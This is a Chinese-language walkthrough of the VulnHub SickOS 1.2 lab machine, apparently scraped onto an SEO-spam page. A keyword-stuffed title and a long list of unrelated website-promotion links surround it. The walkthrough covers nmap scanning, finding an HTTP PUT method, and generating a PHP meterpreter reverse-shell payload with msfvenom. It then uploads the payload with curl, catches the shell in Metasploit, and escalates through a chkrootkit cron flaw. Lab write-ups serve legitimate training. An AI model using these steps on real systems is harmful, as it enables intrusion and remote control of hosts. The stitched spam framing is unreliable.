当前位置: 首页 > wzjs >正文

wordpress检查全站链接石家庄网站建设方案优化

wzjs 2025/7/23 4:49:49
wordpress检查全站链接,石家庄网站建设方案优化,西点培训,八宿县网站seo优化排名一、靶机介绍 靶机基本信息: 靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/作者D4rk发布日期2016年4月27日难度中等 二、信息搜集 记得将网络连接改成nat模式 1、 目标IP探测 目标IP:192.168.155.186 2、 端口扫描 nmap -p- --…

一、靶机介绍

靶机基本信息:

靶机下载链接https://www.vulnhub.com/entry/sickos-12,144/
作者D4rk
发布日期2016年4月27日
难度中等

二、信息搜集

记得将网络连接改成nat模式
1、    目标IP探测
 
目标IP:192.168.155.186
2、    端口扫描

nmap -p- --min-rate 1000 -T4 192.168.155.186


 

   nmap -p22,80 -sV -sC -A  --min-rate 1000 -T4 192.168.155.186


 
三、GETshell


信息不多一个ssh,一个站点。先去站点看看情况
给出一张图片:病毒真的是杀毒公司为了钱而制作的吗
 
查看源码没有什么东西,目录扫描一遍
dirsearch -u http://192.168.155.186
 

好像没有什么有用信息
 
可以确定入口了,查询一下:

searchsploit lighttp


 
但是没有看到1.4.28版本对应漏洞
查询一下网址请求方法:

curl http://192.168.155.186/test/ -vv -X OPTIONS



看到有PUT方法,结合之前的访问目录,猜测文件上传访问反弹shell
制作php脚本

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.155.166 LPORT=443 >shell4431.php



上传:

curl -v -H "Expect:" -T shell4431.php "http://192.168.155.186/test/"



打开msf:

use exploit/multi/handler
show options
set lhost IP
set lport 443
run


 
成功
 

四、提权


内核提权,查看发行版本:

cat /etc/os-release



 
有脚本但是不行
 
列出与系统定时目录相关的文件和配置

ls -la /etc/cron*



找到一个 chkrootkit
有漏洞利用,一个说明文档一个msf脚本
 
将会话放置后台
 


进入特定会话
 

 set seesion 1


成功
 
完成
 

http://www.dtcms.com/wzjs/36435.html

相关文章:

  • 龙游住房和城乡建设局网站免费推广seo
  • 未来网站建设想法自媒体服务平台
  • 厦门网站建设xm37百度快照搜索
  • 营销型网站建设 深圳信科免费制作网页的网站
  • 网站建设分析b站2020推广网站
  • 怎么查看网站外链百度知道首页登录入口
  • 产品开发流程梳理网站优化推广怎么做
  • 广州万户网络技术有限公司招聘关键词seo资源
  • 上海公司注册代理公司北京专门做seo
  • 上海中高端网站建设广州网站设计实力乐云seo
  • 开一个网站多少钱百度推广登陆
  • 淘宝买模板注浆做网站网络营销介绍
  • 合肥的房产网站建设百度开店怎么收费
  • 常德天鹰建设有限公司网站优秀营销案例分享
  • 合肥网站制作哪家有名下载优化大师
  • 邯郸网站设计培训班百度seo服务方案
  • 温州网站建设有限公司营销策划与运营
  • 站长工具seo综合查询黄青岛疫情最新情况
  • 网站霸屏对网站好吗推广互联网营销
  • 烟台专业网站建设企业培训机构
  • 网站优化 方案百度pc网页版登录入口
  • 设计兼职网站有哪些百度竞价排名利弊
  • 制作网站备案幕布免费培训网站
  • 网站模板 兼容ie8哪里有培训网
  • 咸秧草做哪些网站网站搜索引擎拓客
  • 日本做的视频网站有哪些问题seo搜索引擎优化实训总结
  • 网站自己可以做么seo顾问服务 品达优化
  • 太原做微网站的公司百度大搜推广和百度竞价
  • 虚拟主机可以做视频视频网站吗百度seo排名点击软件
  • 百度公司可以做网站么爱站工具包的模块有哪些